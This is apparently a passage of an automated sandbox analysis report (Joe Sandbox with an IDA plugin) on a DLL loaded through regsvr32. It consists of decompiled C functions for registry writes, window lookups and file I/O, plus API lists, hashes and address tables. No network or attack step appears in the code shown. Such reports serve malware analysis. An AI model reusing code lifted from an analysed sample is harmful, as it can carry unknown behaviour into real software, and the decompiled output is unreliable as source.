                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                                                                                            • String ID:
                                                                                                            • API String ID: 2818563221-0
                                                                                                            • Opcode ID: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction ID: cea5fa679d97d2953b6d76dc507eb4c5e7da3a0c11b163d723fb81d4da4a6e61
                                                                                                            • Opcode Fuzzy Hash: e89a53c623c721cb0c3fcde6a2588c450b9b76455553080e70e491aeb3ad2bbb
                                                                                                            • Instruction Fuzzy Hash: 7FF0A932500A306EE353A62B6D88F5E61D8DF81BD0FB20214F459E6192EB24AC8145A9
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 91%
                                                                                                            			E10037A96(void* _a4, char* _a8, char* _a12) {
                                                                                                            				void* _t14;
                                                                                                            				long _t18;
                                                                                                            				signed int _t20;
                                                                                                            				long _t25;
                                                                                                            
                                                                                                            				if(_a12 != 0) {
                                                                                                            					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                                                            						L6:
                                                                                                            						_t14 = 0;
                                                                                                            						L7:
                                                                                                            						return _t14;
                                                                                                            					}
                                                                                                            					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                                                            					_t18 = RegCloseKey(_a4);
                                                                                                            					if(_t18 != 0 || _t25 != 0) {
                                                                                                            						goto L6;
                                                                                                            					} else {
                                                                                                            						_t14 = _t18 + 1;
                                                                                                            						goto L7;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                                                            				asm("sbb eax, eax");
                                                                                                            				return  ~_t20 + 1;
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037AA2
                                                                                                            • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 10037AB6
                                                                                                            • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10037AD0
                                                                                                            • lstrlenA.KERNEL32(?), ref: 10037ADD
                                                                                                            • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 10037AF2
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10037AFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Valuelstrlen$CloseCreate
                                                                                                            • String ID:
                                                                                                            • API String ID: 306239685-0
                                                                                                            • Opcode ID: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction ID: 36ac44db30e1571f4bd1a6b15574b4d5f9e82ccdf85d97020e0dea724d6fc6de
                                                                                                            • Opcode Fuzzy Hash: 44992d35b15f20819090c12f9012e6152085e8f08d1dc228d24d782121a6f8e9
                                                                                                            • Instruction Fuzzy Hash: 4501043220016DFFEB235FA1DD48F9A7BA9FB08792F108410FE1AD9061D3718A60DB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 90%
                                                                                                            			E10029C98(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                            				struct tagRECT _v20;
                                                                                                            				struct HWND__* _t12;
                                                                                                            				struct HWND__* _t21;
                                                                                                            
                                                                                                            				ClientToScreen(_a4,  &_a8);
                                                                                                            				_t12 = GetWindow(_a4, 5);
                                                                                                            				while(1) {
                                                                                                            					_t21 = _t12;
                                                                                                            					if(_t21 == 0) {
                                                                                                            						break;
                                                                                                            					}
                                                                                                            					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                            						GetWindowRect(_t21,  &_v20);
                                                                                                            						_push(_a12);
                                                                                                            						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                            							return _t21;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t12 = GetWindow(_t21, 2);
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}







                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1315500227-0
                                                                                                            • Opcode ID: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction ID: 9b9f6f1c131c314e5c19284c1e668e0a3a9e33f7fca6b6c160f9dd0f3207debf
                                                                                                            • Opcode Fuzzy Hash: 3db020920b72c671971993ae9780b3d492816d86ba5cd9127ef1e8eba5203929
                                                                                                            • Instruction Fuzzy Hash: 7A01623650056ABFDB129F569C48EEE37ADEF017D0F514115FD11EA161D730DA01DB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E1001B36C(signed int _a4, signed int _a8, long _a12) {
                                                                                                            				void _v5;
                                                                                                            				signed int _v12;
                                                                                                            				long _v16;
                                                                                                            				signed int _t79;
                                                                                                            				void* _t82;
                                                                                                            				signed int _t86;
                                                                                                            				signed int* _t89;
                                                                                                            				long _t90;
                                                                                                            				void* _t92;
                                                                                                            				intOrPtr _t93;
                                                                                                            				signed int _t97;
                                                                                                            				intOrPtr _t98;
                                                                                                            				char _t100;
                                                                                                            				signed int _t101;
                                                                                                            				long _t103;
                                                                                                            				long _t106;
                                                                                                            				signed int _t107;
                                                                                                            				signed int _t113;
                                                                                                            				signed int _t114;
                                                                                                            				signed char _t117;
                                                                                                            				intOrPtr _t118;
                                                                                                            				long _t120;
                                                                                                            				void* _t124;
                                                                                                            				intOrPtr* _t125;
                                                                                                            				signed int _t127;
                                                                                                            				signed char* _t128;
                                                                                                            				void* _t129;
                                                                                                            				void* _t130;
                                                                                                            
                                                                                                            				_v12 = _v12 & 0x00000000;
                                                                                                            				_t113 = _a8;
                                                                                                            				_t124 = _t113;
                                                                                                            				if(_a12 == 0) {
                                                                                                            					L42:
                                                                                                            					__eflags = 0;
                                                                                                            					return 0;
                                                                                                            				}
                                                                                                            				_t79 = _a4;
                                                                                                            				_t125 = 0x1004f920 + (_t79 >> 5) * 4;
                                                                                                            				_t127 = (_t79 & 0x0000001f) + (_t79 & 0x0000001f) * 8 << 2;
                                                                                                            				_t82 =  *_t125 + _t127;
                                                                                                            				_t117 =  *((intOrPtr*)(_t82 + 4));
                                                                                                            				if((_t117 & 0x00000002) != 0) {
                                                                                                            					goto L42;
                                                                                                            				}
                                                                                                            				if((_t117 & 0x00000048) != 0 &&  *((char*)(_t82 + 5)) != 0xa) {
                                                                                                            					_a12 = _a12 - 1;
                                                                                                            					 *_t113 =  *((intOrPtr*)( *_t125 + _t127 + 5));
                                                                                                            					_t124 = _t113 + 1;
                                                                                                            					_v12 = 1;
                                                                                                            					 *((char*)( *_t125 + _t127 + 5)) = 0xa;
                                                                                                            				}
                                                                                                            				if(ReadFile( *( *_t125 + _t127), _t124, _a12,  &_v16, 0) != 0) {
                                                                                                            					_t86 = _v16;
                                                                                                            					_t118 =  *_t125;
                                                                                                            					_v12 = _v12 + _t86;
                                                                                                            					__eflags =  *(_t118 + _t127 + 4) & 0x00000080;
                                                                                                            					if(( *(_t118 + _t127 + 4) & 0x00000080) == 0) {
                                                                                                            						L41:
                                                                                                            						return _v12;
                                                                                                            					}
                                                                                                            					__eflags = _t86;
                                                                                                            					if(_t86 == 0) {
                                                                                                            						L15:
                                                                                                            						_t89 =  *_t125 + _t127 + 4;
                                                                                                            						 *_t89 =  *_t89 & 0x000000fb;
                                                                                                            						__eflags =  *_t89;
                                                                                                            						L16:
                                                                                                            						_t90 = _a8;
                                                                                                            						_t120 = _v12 + _t90;
                                                                                                            						__eflags = _t90 - _t120;
                                                                                                            						_a12 = _t90;
                                                                                                            						_v12 = _t120;
                                                                                                            						if(_t90 >= _t120) {
                                                                                                            							L40:
                                                                                                            							_t114 = _t113 - _a8;
                                                                                                            							__eflags = _t114;
                                                                                                            							_v12 = _t114;
                                                                                                            							goto L41;
                                                                                                            						} else {
                                                                                                            							goto L17;
                                                                                                            						}
                                                                                                            						while(1) {
                                                                                                            							L17:
                                                                                                            							_t92 =  *_a12;
                                                                                                            							__eflags = _t92 - 0x1a;
                                                                                                            							if(_t92 == 0x1a) {
                                                                                                            								break;
                                                                                                            							}
                                                                                                            							__eflags = _t92 - 0xd;
                                                                                                            							if(_t92 == 0xd) {
                                                                                                            								__eflags = _a12 - _t120 - 1;
                                                                                                            								if(_a12 >= _t120 - 1) {
                                                                                                            									_a12 = _a12 + 1;
                                                                                                            									_t97 = ReadFile( *( *_t125 + _t127),  &_v5, 1,  &_v16, 0);
                                                                                                            									__eflags = _t97;
                                                                                                            									if(_t97 != 0) {
                                                                                                            										L26:
                                                                                                            										__eflags = _v16;
                                                                                                            										if(_v16 == 0) {
                                                                                                            											L34:
                                                                                                            											 *_t113 = 0xd;
                                                                                                            											L35:
                                                                                                            											_t113 = _t113 + 1;
                                                                                                            											__eflags = _t113;
                                                                                                            											L36:
                                                                                                            											_t120 = _v12;
                                                                                                            											__eflags = _a12 - _t120;
                                                                                                            											if(_a12 < _t120) {
                                                                                                            												continue;
                                                                                                            											}
                                                                                                            											goto L40;
                                                                                                            										}
                                                                                                            										_t98 =  *_t125;
                                                                                                            										__eflags =  *(_t98 + _t127 + 4) & 0x00000048;
                                                                                                            										if(( *(_t98 + _t127 + 4) & 0x00000048) == 0) {
                                                                                                            											__eflags = _t113 - _a8;
                                                                                                            											if(__eflags != 0) {
                                                                                                            												L33:
                                                                                                            												E1001968C(__eflags, _a4, 0xffffffff, 1);
                                                                                                            												_t130 = _t130 + 0xc;
                                                                                                            												__eflags = _v5 - 0xa;
                                                                                                            												if(_v5 == 0xa) {
                                                                                                            													goto L36;
                                                                                                            												}
                                                                                                            												goto L34;
                                                                                                            											}
                                                                                                            											__eflags = _v5 - 0xa;
                                                                                                            											if(__eflags != 0) {
                                                                                                            												goto L33;
                                                                                                            											}
                                                                                                            											L32:
                                                                                                            											 *_t113 = 0xa;
                                                                                                            											goto L35;
                                                                                                            										}
                                                                                                            										_t100 = _v5;
                                                                                                            										__eflags = _t100 - 0xa;
                                                                                                            										if(_t100 == 0xa) {
                                                                                                            											goto L32;
                                                                                                            										}
                                                                                                            										 *_t113 = 0xd;
                                                                                                            										 *((char*)( *_t125 + _t127 + 5)) = _t100;
                                                                                                            										goto L35;
                                                                                                            									}
                                                                                                            									_t101 = GetLastError();
                                                                                                            									__eflags = _t101;
                                                                                                            									if(_t101 != 0) {
                                                                                                            										goto L34;
                                                                                                            									}
                                                                                                            									goto L26;
                                                                                                            								}
                                                                                                            								_t103 = _a12 + 1;
                                                                                                            								__eflags =  *_t103 - 0xa;
                                                                                                            								if( *_t103 != 0xa) {
                                                                                                            									_a12 = _t103;
                                                                                                            									goto L34;
                                                                                                            								}
                                                                                                            								_a12 = _a12 + 2;
                                                                                                            								goto L32;
                                                                                                            							}
                                                                                                            							 *_t113 = _t92;
                                                                                                            							_t113 = _t113 + 1;
                                                                                                            							_a12 = _a12 + 1;
                                                                                                            							goto L36;
                                                                                                            						}
                                                                                                            						_t93 =  *_t125;
                                                                                                            						__eflags =  *(_t93 + _t127 + 4) & 0x00000040;
                                                                                                            						if(( *(_t93 + _t127 + 4) & 0x00000040) == 0) {
                                                                                                            							_t128 = _t93 + _t127 + 4;
                                                                                                            							 *_t128 =  *_t128 | 0x00000002;
                                                                                                            							__eflags =  *_t128;
                                                                                                            						}
                                                                                                            						goto L40;
                                                                                                            					}
                                                                                                            					__eflags =  *_t113 - 0xa;
                                                                                                            					if( *_t113 != 0xa) {
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					 *(_t118 + _t127 + 4) =  *(_t118 + _t127 + 4) | 0x00000004;
                                                                                                            					goto L16;
                                                                                                            				} else {
                                                                                                            					_t106 = GetLastError();
                                                                                                            					_t129 = 5;
                                                                                                            					if(_t106 != _t129) {
                                                                                                            						__eflags = _t106 - 0x6d;
                                                                                                            						if(_t106 == 0x6d) {
                                                                                                            							goto L42;
                                                                                                            						}
                                                                                                            						_t107 = E10013707(_t106);
                                                                                                            						L10:
                                                                                                            						return _t107 | 0xffffffff;
                                                                                                            					}
                                                                                                            					 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            					_t107 = E100136FE();
                                                                                                            					 *_t107 = _t129;
                                                                                                            					goto L10;
                                                                                                            				}
                                                                                                            			}































                                                                                                            0x1001b466
                                                                                                            0x1001b469
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b535
                                                                                                            0x1001b538
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b46f
                                                                                                            0x1001b46f
                                                                                                            0x1001b472
                                                                                                            0x1001b474
                                                                                                            0x1001b476
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b47c
                                                                                                            0x1001b47e
                                                                                                            0x1001b48c
                                                                                                            0x1001b48f
                                                                                                            0x1001b4a5
                                                                                                            0x1001b4b9
                                                                                                            0x1001b4bf
                                                                                                            0x1001b4c1
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4cd
                                                                                                            0x1001b4d1
                                                                                                            0x1001b513
                                                                                                            0x1001b513
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b516
                                                                                                            0x1001b517
                                                                                                            0x1001b517
                                                                                                            0x1001b51a
                                                                                                            0x1001b51d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b523
                                                                                                            0x1001b4d3
                                                                                                            0x1001b4d5
                                                                                                            0x1001b4da
                                                                                                            0x1001b4ee
                                                                                                            0x1001b4f1
                                                                                                            0x1001b4fe
                                                                                                            0x1001b505
                                                                                                            0x1001b50a
                                                                                                            0x1001b50d
                                                                                                            0x1001b511
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b511
                                                                                                            0x1001b4f3
                                                                                                            0x1001b4f7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4f9
                                                                                                            0x00000000
                                                                                                            0x1001b4f9
                                                                                                            0x1001b4dc
                                                                                                            0x1001b4df
                                                                                                            0x1001b4e1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4e3
                                                                                                            0x1001b4e8
                                                                                                            0x00000000
                                                                                                            0x1001b4e8
                                                                                                            0x1001b4c3
                                                                                                            0x1001b4c9
                                                                                                            0x1001b4cb
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b4cb
                                                                                                            0x1001b494
                                                                                                            0x1001b495
                                                                                                            0x1001b498
                                                                                                            0x1001b4a0
                                                                                                            0x00000000
                                                                                                            0x1001b4a0
                                                                                                            0x1001b49a
                                                                                                            0x00000000
                                                                                                            0x1001b49a
                                                                                                            0x1001b480
                                                                                                            0x1001b482
                                                                                                            0x1001b483
                                                                                                            0x00000000
                                                                                                            0x1001b483
                                                                                                            0x1001b525
                                                                                                            0x1001b527
                                                                                                            0x1001b52c
                                                                                                            0x1001b52e
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x1001b532
                                                                                                            0x00000000
                                                                                                            0x1001b52c
                                                                                                            0x1001b440
                                                                                                            0x1001b443
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b44b
                                                                                                            0x00000000
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f0
                                                                                                            0x1001b3f8
                                                                                                            0x1001b3fb
                                                                                                            0x1001b411
                                                                                                            0x1001b414
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001b41b
                                                                                                            0x1001b421
                                                                                                            0x00000000
                                                                                                            0x1001b421
                                                                                                            0x1001b402
                                                                                                            0x1001b408
                                                                                                            0x1001b40d
                                                                                                            0x00000000
                                                                                                            0x1001b40d

                                                                                                            APIs
                                                                                                            • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 1001B3E6
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B3F0
                                                                                                            • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 1001B4B9
                                                                                                            • GetLastError.KERNEL32(?,?,?), ref: 1001B4C3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorFileLastRead
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 1948546556-4125583295
                                                                                                            • Opcode ID: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction ID: 3bbfbaef22ec515d269d62fd47d355a82d48074a4c8ee7a64ff4f0343116150f
                                                                                                            • Opcode Fuzzy Hash: 1586ebca8aaa9a6ea4319f4853b1feeec289fced979c0bdf45d6e5b6f0657abd
                                                                                                            • Instruction Fuzzy Hash: DB61D374A04B89DFDB21CFA8C880B997BF0EF05354F158099E9618F2A2D770DAC1CB11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E100197AB(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _t68;
                                                                                                            				void** _t73;
                                                                                                            				signed int _t74;
                                                                                                            				long _t76;
                                                                                                            				intOrPtr _t79;
                                                                                                            				signed int _t81;
                                                                                                            				char* _t86;
                                                                                                            				int _t91;
                                                                                                            				long _t93;
                                                                                                            				intOrPtr* _t100;
                                                                                                            				void* _t102;
                                                                                                            				signed int _t107;
                                                                                                            				char _t110;
                                                                                                            				struct _OVERLAPPED* _t112;
                                                                                                            				long _t115;
                                                                                                            				signed int _t118;
                                                                                                            				struct _OVERLAPPED* _t120;
                                                                                                            				void* _t121;
                                                                                                            				void* _t123;
                                                                                                            
                                                                                                            				_t121 = _t123 - 0x3a0;
                                                                                                            				_t68 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_t112 = 0;
                                                                                                            				 *((intOrPtr*)(_t121 + 0x39c)) = _t68;
                                                                                                            				 *(_t121 - 0x78) = 0;
                                                                                                            				 *((intOrPtr*)(_t121 - 0x7c)) = 0;
                                                                                                            				if( *(_t121 + 0x3b0) != 0) {
                                                                                                            					_t100 = 0x1004f920 + ( *(_t121 + 0x3a8) >> 5) * 4;
                                                                                                            					_t118 = ( *(_t121 + 0x3a8) & 0x0000001f) + ( *(_t121 + 0x3a8) & 0x0000001f) * 8 << 2;
                                                                                                            					__eflags =  *( *_t100 + _t118 + 4) & 0x00000020;
                                                                                                            					if(__eflags != 0) {
                                                                                                            						E1001B190(_t102, __eflags,  *(_t121 + 0x3a8), 0, 0, 2);
                                                                                                            					}
                                                                                                            					_t73 =  *_t100 + _t118;
                                                                                                            					__eflags = _t73[1] & 0x00000080;
                                                                                                            					if((_t73[1] & 0x00000080) == 0) {
                                                                                                            						_t74 = WriteFile( *_t73,  *(_t121 + 0x3ac),  *(_t121 + 0x3b0), _t121 - 0x80, _t112);
                                                                                                            						__eflags = _t74;
                                                                                                            						if(_t74 == 0) {
                                                                                                            							 *(_t121 - 0x6c) = GetLastError();
                                                                                                            						} else {
                                                                                                            							 *(_t121 - 0x6c) = _t112;
                                                                                                            							 *(_t121 - 0x78) =  *(_t121 - 0x80);
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						__eflags =  *(_t121 + 0x3b0) - _t112;
                                                                                                            						 *(_t121 - 0x74) =  *(_t121 + 0x3ac);
                                                                                                            						 *(_t121 - 0x6c) = _t112;
                                                                                                            						if( *(_t121 + 0x3b0) <= _t112) {
                                                                                                            							L25:
                                                                                                            							_t79 =  *_t100;
                                                                                                            							__eflags =  *(_t79 + _t118 + 4) & 0x00000040;
                                                                                                            							if(( *(_t79 + _t118 + 4) & 0x00000040) == 0) {
                                                                                                            								L28:
                                                                                                            								 *((intOrPtr*)(E100136F5())) = 0x1c;
                                                                                                            								_t81 = E100136FE();
                                                                                                            								 *_t81 = _t112;
                                                                                                            								L29:
                                                                                                            								_t77 = _t81 | 0xffffffff;
                                                                                                            								L31:
                                                                                                            								goto L32;
                                                                                                            							}
                                                                                                            							__eflags =  *( *(_t121 + 0x3ac)) - 0x1a;
                                                                                                            							if( *( *(_t121 + 0x3ac)) != 0x1a) {
                                                                                                            								goto L28;
                                                                                                            							}
                                                                                                            							_t77 = 0;
                                                                                                            							goto L31;
                                                                                                            						} else {
                                                                                                            							goto L6;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L6:
                                                                                                            							_t107 =  *(_t121 - 0x74) -  *(_t121 + 0x3ac);
                                                                                                            							__eflags = _t107;
                                                                                                            							_t86 = _t121 - 0x68;
                                                                                                            							 *(_t121 - 0x70) = _t112;
                                                                                                            							do {
                                                                                                            								__eflags = _t107 -  *(_t121 + 0x3b0);
                                                                                                            								if(_t107 >=  *(_t121 + 0x3b0)) {
                                                                                                            									break;
                                                                                                            								}
                                                                                                            								 *(_t121 - 0x74) =  *(_t121 - 0x74) + 1;
                                                                                                            								_t110 =  *( *(_t121 - 0x74));
                                                                                                            								_t107 = _t107 + 1;
                                                                                                            								__eflags = _t110 - 0xa;
                                                                                                            								if(_t110 == 0xa) {
                                                                                                            									 *((intOrPtr*)(_t121 - 0x7c)) =  *((intOrPtr*)(_t121 - 0x7c)) + 1;
                                                                                                            									 *_t86 = 0xd;
                                                                                                            									_t86 = _t86 + 1;
                                                                                                            									_t34 = _t121 - 0x70;
                                                                                                            									 *_t34 =  &( *(_t121 - 0x70)->Internal);
                                                                                                            									__eflags =  *_t34;
                                                                                                            								}
                                                                                                            								 *_t86 = _t110;
                                                                                                            								_t86 = _t86 + 1;
                                                                                                            								 *(_t121 - 0x70) =  &( *(_t121 - 0x70)->Internal);
                                                                                                            								__eflags =  *(_t121 - 0x70) - 0x400;
                                                                                                            							} while ( *(_t121 - 0x70) < 0x400);
                                                                                                            							_t115 = _t86 - _t121 - 0x68;
                                                                                                            							_t91 = WriteFile( *( *_t100 + _t118), _t121 - 0x68, _t115, _t121 - 0x80, 0);
                                                                                                            							__eflags = _t91;
                                                                                                            							if(_t91 == 0) {
                                                                                                            								 *(_t121 - 0x6c) = GetLastError();
                                                                                                            								L16:
                                                                                                            								_t112 = 0;
                                                                                                            								__eflags = 0;
                                                                                                            								L17:
                                                                                                            								_t76 =  *(_t121 - 0x78);
                                                                                                            								__eflags = _t76 - _t112;
                                                                                                            								if(_t76 != _t112) {
                                                                                                            									_t77 = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                                                            									__eflags = _t76 -  *((intOrPtr*)(_t121 - 0x7c));
                                                                                                            									goto L31;
                                                                                                            								}
                                                                                                            								__eflags =  *(_t121 - 0x6c) - _t112;
                                                                                                            								if( *(_t121 - 0x6c) == _t112) {
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            								_t120 = 5;
                                                                                                            								__eflags =  *(_t121 - 0x6c) - _t120;
                                                                                                            								if( *(_t121 - 0x6c) != _t120) {
                                                                                                            									_t81 = E10013707( *(_t121 - 0x6c));
                                                                                                            								} else {
                                                                                                            									 *((intOrPtr*)(E100136F5())) = 9;
                                                                                                            									_t81 = E100136FE();
                                                                                                            									 *_t81 = _t120;
                                                                                                            								}
                                                                                                            								goto L29;
                                                                                                            							}
                                                                                                            							_t93 =  *(_t121 - 0x80);
                                                                                                            							 *(_t121 - 0x78) =  *(_t121 - 0x78) + _t93;
                                                                                                            							__eflags = _t93 - _t115;
                                                                                                            							if(_t93 < _t115) {
                                                                                                            								goto L16;
                                                                                                            							}
                                                                                                            							_t112 = 0;
                                                                                                            							__eflags =  *(_t121 - 0x74) -  *(_t121 + 0x3ac) -  *(_t121 + 0x3b0);
                                                                                                            						} while ( *(_t121 - 0x74) -  *(_t121 + 0x3ac) <  *(_t121 + 0x3b0));
                                                                                                            					}
                                                                                                            					goto L17;
                                                                                                            				} else {
                                                                                                            					_t77 = 0;
                                                                                                            					L32:
                                                                                                            					return E100117AE(_t77,  *((intOrPtr*)(_t121 + 0x39c)));
                                                                                                            				}
                                                                                                            			}























                                                                                                            APIs
                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,00000000,1004C878,00000001), ref: 10019893
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 3934441357-4125583295
                                                                                                            • Opcode ID: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction ID: bcb25415e8510b231303bc6364b9eff1bf1e0548ad7273a78b3d91e774eab1a2
                                                                                                            • Opcode Fuzzy Hash: 965eb31f54da86365c2da1447df739003087db675420f9f90e2f522ac335ea6e
                                                                                                            • Instruction Fuzzy Hash: AD513671900298DFDB22CFA9C880ADDBBF8FF46744F21411AE9599F256DB309A81CF11
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10022233(intOrPtr* __ecx) {
                                                                                                            				struct HWND__* _v40;
                                                                                                            				struct HWND__* _v44;
                                                                                                            				intOrPtr _v48;
                                                                                                            				void* _v52;
                                                                                                            				long _t34;
                                                                                                            				long _t43;
                                                                                                            				struct HWND__* _t48;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				signed int _t64;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				intOrPtr* _t72;
                                                                                                            
                                                                                                            				_t72 = __ecx;
                                                                                                            				_t69 = E1001F7AE();
                                                                                                            				if(_t69 != 0) {
                                                                                                            					if( *((intOrPtr*)(_t69 + 0x1c)) == __ecx) {
